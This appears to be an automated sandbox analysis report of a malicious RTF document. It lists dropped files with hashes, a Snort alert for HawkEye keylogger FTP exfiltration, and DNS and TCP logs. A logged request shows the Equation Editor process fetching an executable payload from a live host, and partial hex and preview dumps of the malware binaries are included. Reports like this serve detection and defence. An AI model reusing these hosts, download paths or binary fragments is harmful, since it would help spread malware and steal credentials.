Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....W..............0..T.........."r... ........@.. ...............................[....`..................................q..O....................b...>...........p............................................... ............... ..H............text...(R... ...T.................. ..`.rsrc................V..............@..@.reloc...............`..............@..B.................r......H........"...J...........m.......o......................................2~.....o.....r...p(....VrK..p(....s...........0..........(....(....o....o....(....o.... .....T(....o....(....o....o....o ....4(....o....(....o....o....o!.....(....rm..ps"...o....(#........($....o%....ry..p......%.r...p.%.(.....(....(&....('.......o(...(&........................."..().....{Q...-...}Q.....(...(....(+....(..."..(,.....(......(-....r...p.(....o/...s....}T.......0.. .......~S...-.s

C:\Users\user\AppData\Local\Temp\bhvC767.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x63a10f1a, page size 32768, DirtyShutdown, Windows version 6.1
Category:	dropped
Size (bytes):	21037056
Entropy (8bit):	1.1430424213637926
Encrypted:	false
SSDEEP:	24576:v01U91o2I+0mZ5lwhHLLGpHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:v0EXG1LoHqqEXwPW+RHA6m1fN
MD5:	2DEBCCB53B8D793E28AE6121867FA6B6
SHA1:	4F5F6E1976D924B31895F32DC6B52DFDF7C79A5D
SHA-256:	2F23BFB6E0EF2D829DB46E4329BAF30A44CB37732F411D2D97CAED5AD38F7BE8
SHA-512:	C2728A6685E778C011D75A6C29482360EB42E6911729D6756C3BF98A95AB33EAAE2A7B27BF611A9460A913C8273D94F288C6A81281BE3D89054737E1CEDDA652
Malicious:	false
Preview:	c...... ........................u......................s............x..%....x.......................................u..............................................................................................$............................................................................................................................... .......7....x......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\holderwb.txt Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\New Updated 20210810.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Tue Aug 10 21:28:35 2021, length=31314, window=hide
Category:	dropped
Size (bytes):	2128
Entropy (8bit):	4.548558230244544
Encrypted:	false
SSDEEP:	48:8p/XT0jFFyZB6DsQh2p/XT0jFFyZB6DsQ/:8p/XojFIZ4DsQh2p/XojFIZ4DsQ/
MD5:	2D2029DD0C9AB7CDEB1CB5474691D3FF
SHA1:	36617B8D986F86ABC54BA3EFEC9DA53F14DCA964
SHA-256:	2CF7D8B36F1F9433C03386DF32CD65BF089AB76ADD81954028731DEB9363D82C
SHA-512:	D023262076B62CCC64659916E176C246CDA30438F9415D40526D43D1E3593D058E296603EE679790ECFC8CCF9F157CDF6C5888E54666B1FED668D1414AE35ECD
Malicious:	false
Preview:	L..................F.... .../$...{../$...{......7...Rz...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....z.2.Rz...S.. .NEWUPD~1.DOC..^.......Q.y.Q.y...8.....................N.e.w. .U.p.d.a.t.e.d. .2.0.2.1.0.8.1.0...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\284992\Users.user\Desktop\New Updated 20210810.doc./.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.N.e.w. .U.p.d.a.t.e.d. .2.0.2.1.0.8.1.0...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......284992..........D_..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	98
Entropy (8bit):	4.335765140025444
Encrypted:	false
SSDEEP:	3:M1yyzVSLUz+yzVSLUmX1yyzVSLUv:MVzVSLM7zVSLzzVSL2
MD5:	31C4D1728DA7B6F622EFBC2CEB4AD8EC
SHA1:	38134D2FDC6C6AF7C865F531D3F9F9B6431FF14C
SHA-256:	D7F13619B7963476C6AADD9FB50BC480B7E32B29ED2CC208F863DC861F1C52E6
SHA-512:	2B0DAF48F4CBC7A7FECF8A77236C0A1C7A7E0A7E04699151BC0C50A2801F5C07466CBCEE31DEA085D691891E8AADA89A30F26B7C65A96C85902774C15E460642
Malicious:	false
Preview:	[doc]..New Updated 20210810.LNK=0..New Updated 20210810.LNK=0..[doc]..New Updated 20210810.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4311600611816426
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVydH/5llORewrU9lln:vdsCkWtORWRjYl
MD5:	390880DCFAA790037FA37F50A7080387
SHA1:	760940B899B1DC961633242DB5FF170A0522B0A5
SHA-256:	BE4A99C0605649A08637AC499E8C871B5ECA2BAA03909E8ADBAA4C7A6A1D5391
SHA-512:	47E6AC186253342882E375AA38252D8473D1CA5F6682FABD5F459E1B088B935E326E1149080E0FE94AB176A101BA2CB9E8B700AB5AFAE26F865982A8DA295FD3
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\name.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1245696
Entropy (8bit):	6.577327226998129
Encrypted:	false
SSDEEP:	24576:yVwq/EUmGq/wKgDyT/vcKcPw+U6kulaoS18PNMnDbMZ:yVw8lq/wK4wcKcPrXIIN6P
MD5:	83F58ECF0778E3B0ACCA8497DF23EF23
SHA1:	A2123E816FCD387873272E022220FBC05B96D392
SHA-256:	437FAE5AA2CAD8DDB1FE3E316AFDC6A1FDD2676084131FDC082FFDC8A53F066D
SHA-512:	AA80D30C7F4234DFD26170B7817788DBDDA9C02897D0AC788C253D815A14F444DF8DCE47C59B05875821F196CB3571DE4EC584689059C1A86B7F64F504BF4A63
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 36%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......6................................. ... ....@.. .......................`............`.................................L...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........-..........#...@...h............................................K.K.K.E.f.YyD.N.`.s.].E.f.YnD.N.`.s&].E.f.YfD.N.`.s.].E.f.YHD)N.`QAR@PA.ScN]D.jNy\W.O.l.S7NED.jJy.W.O.l.SkNCD.jGyFW.O.l.SpN[D.j]y.W.O.l.S8NyD.jJyAW.O.l.SdN]D.jCyEW.O.l.S"NGD.jVy]W.O.l.S-N.D.jVyQW.O.l.S7NBD.jSy.W.O.l.SxNBD.jGy.W.O.l.S2NVD.jVyXW.O.l.S NTD.jUy.W.O.l.S7NED.jCy.W.O.l.SxNUD.jIyAW.O.l.S9NUD.jRyKW.O.l.S$NVD.jRy.W.O.l.SfN]D^.[.\...).]...A..R.*...<.$...8z%./.....<.$...8g%./.....<.$...8f%./.....<

C:\Users\user\AppData\Roaming\pid.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\InstallUtil.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	3
Entropy (8bit):	1.584962500721156
Encrypted:	false
SSDEEP:	3:jX:r
MD5:	A1D33D0DFEC820B41B54430B50E96B5C
SHA1:	B7ECF1CA1C97492DE831D17A3AB559D4A1F8B735
SHA-256:	8B80F49EC2822CB3CDBE97D9405E39AE40BA418B084C06604B51E2A5AF11A7F8
SHA-512:	4288199C8BAE8885D566B276F4BEE97A0714AD8E44BE2285579B913F59E06D3807ED583F72FCFF8BB0B042E6CBD59AB99EB02687662D669BBF215A9E72D1AD89
Malicious:	false
Preview:	752

C:\Users\user\AppData\Roaming\pidloc.txt Download File
Process:	C:\Users\user\AppData\Local\Temp\InstallUtil.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	49
Entropy (8bit):	4.295746773031725
Encrypted:	false
SSDEEP:	3:oNXp4E2J5xAIOWRxRI0dAn:oNP23f5RndA
MD5:	2D61FD97BB78C3900DD39B26447C5C1A
SHA1:	117F447B8159E31DF5B4422F07B04267231B4A8E
SHA-256:	49A7F6995E282A8964916CFCB0A1982BC5418EF85AB7224EBC420C21281B91C9
SHA-512:	B57128EE990D8F213045ECE49D7F8C3283415B1DAB22C79D3F39EF98D63F0A778D9CB095597FC57ED72F74C85036E59CCA2E7BAD3963E5758C59CB9ACE4518DF
Malicious:	false
Preview:	C:\Users\user\AppData\Local\Temp\InstallUtil.exe

C:\Users\user\Desktop\~$w Updated 20210810.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4311600611816426
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVydH/5llORewrU9lln:vdsCkWtORWRjYl
MD5:	390880DCFAA790037FA37F50A7080387
SHA1:	760940B899B1DC961633242DB5FF170A0522B0A5
SHA-256:	BE4A99C0605649A08637AC499E8C871B5ECA2BAA03909E8ADBAA4C7A6A1D5391
SHA-512:	47E6AC186253342882E375AA38252D8473D1CA5F6682FABD5F459E1B088B935E326E1149080E0FE94AB176A101BA2CB9E8B700AB5AFAE26F865982A8DA295FD3
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	5.274203629540219
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	New Updated 20210810.doc
File size:	31314
MD5:	e7228f0fdb6675e599fce2e7697e237f
SHA1:	4ee29bd4a9e6756326728a6d3a2bcdb504d01e6a
SHA256:	03e73adb2a943786db217feedb75a14e7ce7ce39b8fb9f91a0fec989d1ce9188
SHA512:	02b9d37288267eca0f7bd38885dd26e37ac7206157522f8543368c73ee474973d2af4609e979ceb1fc9b133b23357a028a0004af0268267831b926626ea71fb8
SSDEEP:	384:Fb2EbIs4KbTHxRHco/AZboqfUFiRZvzsyPgVAz59hqHLXisCa12k3cvM+aSkXn0e:pJ8xqHhA1oqfUFPmaHLXida12klSqtHn
File Content Preview:	{\rtf7515{\object79721978 79721978 \'' \objautlink41827461\~\objupdate7559938775599387 \objw3968\objh1226{\\objdata313341 {{{{{{{{{{\bin00000 {\\objdata313341

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	000000FAh								no
1	000000C7h	2	embedded	3arM9s1fYq8inCI	4096				no

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
08/10/21-15:30:03.167957	TCP	2020410	ET TROJAN HawkEye Keylogger FTP	49171	21	192.168.2.22	45.141.152.18

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 10, 2021 15:29:15.222793102 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:15.482306004 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:15.482491970 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:15.482774019 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:15.742620945 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:15.743505955 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:15.743583918 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:15.743613958 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:15.743639946 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:15.743664026 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:15.743690014 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:15.743706942 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:15.743716002 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:15.743730068 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:15.743752003 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:15.743760109 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:15.743772030 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:15.743782043 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:15.743793011 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:15.743813992 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:15.743814945 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:15.743839025 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:15.743865013 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:15.752291918 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.005959988 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.006010056 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.006059885 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.006066084 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.006098032 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.006102085 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.006105900 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.006145000 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.006146908 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.006185055 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.006186008 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.006223917 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.006510973 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.006553888 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.006583929 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.006596088 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.006603003 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.006637096 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.006639004 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.006681919 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.006686926 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.006726980 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.006731987 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.006769896 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.006772995 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.006809950 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.006829023 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.006866932 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.006869078 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.006907940 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.006911993 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.006946087 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.006947041 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.006985903 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.006985903 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.007020950 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.007035017 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.007080078 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.007083893 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.007137060 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.007741928 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.265613079 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.265676022 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.265794039 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.266480923 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.266500950 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.266518116 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.266532898 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.266551018 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.266554117 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.266602993 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.266624928 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.266643047 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.266647100 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.266661882 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.266661882 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.266679049 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.266680956 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.266693115 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.266697884 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.266707897 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.266715050 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.266726017 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.266737938 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.266782999 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.267081022 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.267098904 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.267129898 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.267148972 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.267152071 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.267163038 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.267174959 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.267179966 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.267188072 CEST	49167	80	192.168.2.22	103.255.237.180
Aug 10, 2021 15:29:16.267200947 CEST	80	49167	103.255.237.180	192.168.2.22
Aug 10, 2021 15:29:16.267205954 CEST	49167	80	192.168.2.22	103.255.237.180

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 10, 2021 15:29:13.669833899 CEST	52197	53	192.168.2.22	8.8.8.8
Aug 10, 2021 15:29:14.058414936 CEST	53	52197	8.8.8.8	192.168.2.22
Aug 10, 2021 15:29:14.058936119 CEST	52197	53	192.168.2.22	8.8.8.8
Aug 10, 2021 15:29:14.449099064 CEST	53	52197	8.8.8.8	192.168.2.22
Aug 10, 2021 15:29:14.449490070 CEST	52197	53	192.168.2.22	8.8.8.8
Aug 10, 2021 15:29:14.833285093 CEST	53	52197	8.8.8.8	192.168.2.22
Aug 10, 2021 15:29:14.833820105 CEST	52197	53	192.168.2.22	8.8.8.8
Aug 10, 2021 15:29:15.206598043 CEST	53	52197	8.8.8.8	192.168.2.22
Aug 10, 2021 15:29:29.026834965 CEST	53099	53	192.168.2.22	8.8.8.8
Aug 10, 2021 15:29:29.062861919 CEST	53	53099	8.8.8.8	192.168.2.22
Aug 10, 2021 15:29:29.804373026 CEST	52838	53	192.168.2.22	8.8.8.8
Aug 10, 2021 15:29:29.845074892 CEST	53	52838	8.8.8.8	192.168.2.22
Aug 10, 2021 15:29:29.857959986 CEST	61200	53	192.168.2.22	8.8.8.8
Aug 10, 2021 15:29:29.891233921 CEST	53	61200	8.8.8.8	192.168.2.22
Aug 10, 2021 15:29:44.135051012 CEST	49548	53	192.168.2.22	8.8.8.8
Aug 10, 2021 15:29:44.174273968 CEST	53	49548	8.8.8.8	192.168.2.22
Aug 10, 2021 15:30:02.893754005 CEST	55627	53	192.168.2.22	8.8.8.8
Aug 10, 2021 15:30:02.933723927 CEST	53	55627	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 10, 2021 15:29:13.669833899 CEST	192.168.2.22	8.8.8.8	0x5ccc	Standard query (0)	vecvietnam.com.vn	A (IP address)	IN (0x0001)
Aug 10, 2021 15:29:14.058936119 CEST	192.168.2.22	8.8.8.8	0x5ccc	Standard query (0)	vecvietnam.com.vn	A (IP address)	IN (0x0001)
Aug 10, 2021 15:29:14.449490070 CEST	192.168.2.22	8.8.8.8	0x5ccc	Standard query (0)	vecvietnam.com.vn	A (IP address)	IN (0x0001)
Aug 10, 2021 15:29:14.833820105 CEST	192.168.2.22	8.8.8.8	0x5ccc	Standard query (0)	vecvietnam.com.vn	A (IP address)	IN (0x0001)
Aug 10, 2021 15:29:29.026834965 CEST	192.168.2.22	8.8.8.8	0x98df	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 10, 2021 15:29:44.135051012 CEST	192.168.2.22	8.8.8.8	0xb03b	Standard query (0)	64.89.4.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 10, 2021 15:30:02.893754005 CEST	192.168.2.22	8.8.8.8	0x2cd4	Standard query (0)	ftp.badonfashoin.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 10, 2021 15:29:14.058414936 CEST	8.8.8.8	192.168.2.22	0x5ccc	No error (0)	vecvietnam.com.vn		103.255.237.180	A (IP address)	IN (0x0001)
Aug 10, 2021 15:29:14.449099064 CEST	8.8.8.8	192.168.2.22	0x5ccc	No error (0)	vecvietnam.com.vn		103.255.237.180	A (IP address)	IN (0x0001)
Aug 10, 2021 15:29:14.833285093 CEST	8.8.8.8	192.168.2.22	0x5ccc	No error (0)	vecvietnam.com.vn		103.255.237.180	A (IP address)	IN (0x0001)
Aug 10, 2021 15:29:15.206598043 CEST	8.8.8.8	192.168.2.22	0x5ccc	No error (0)	vecvietnam.com.vn		103.255.237.180	A (IP address)	IN (0x0001)
Aug 10, 2021 15:29:29.062861919 CEST	8.8.8.8	192.168.2.22	0x98df	No error (0)	www.google.com		142.250.185.196	A (IP address)	IN (0x0001)
Aug 10, 2021 15:29:44.174273968 CEST	8.8.8.8	192.168.2.22	0xb03b	Name error (3)	64.89.4.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Aug 10, 2021 15:30:02.933723927 CEST	8.8.8.8	192.168.2.22	0x2cd4	No error (0)	ftp.badonfashoin.com		45.141.152.18	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

vecvietnam.com.vn

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	103.255.237.180	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Aug 10, 2021 15:29:15.482774019 CEST	1	OUT	GET /xpen5/UPDATED-08102021.PDF.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: vecvietnam.com.vn Connection: Keep-Alive
Aug 10, 2021 15:29:15.743505955 CEST	2	IN	HTTP/1.1 200 OK Server: Apache Date: Tue, 10 Aug 2021 13:29:15 GMT Content-Type: application/octet-stream Content-Length: 1245696 Last-Modified: Tue, 10 Aug 2021 01:00:00 GMT Connection: keep-alive ETag: "6111cf90-130200" Expires: Thu, 09 Sep 2021 13:29:15 GMT Cache-Control: max-age=2592000 Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d7 d1 e3 36 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 f8 12 00 00 08 00 00 00 00 00 00 9e 17 13 00 00 20 00 00 00 20 13 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 13 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 17 13 00 4f 00 00 00 00 20 13 00 f6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 13 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 f7 12 00 00 20 00 00 00 f8 12 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f6 05 00 00 00 20 13 00 00 06 00 00 00 fa 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 13 00 00 02 00 00 00 00 13 00 00 00 00 00 00 00 00 00 00 00 00 00 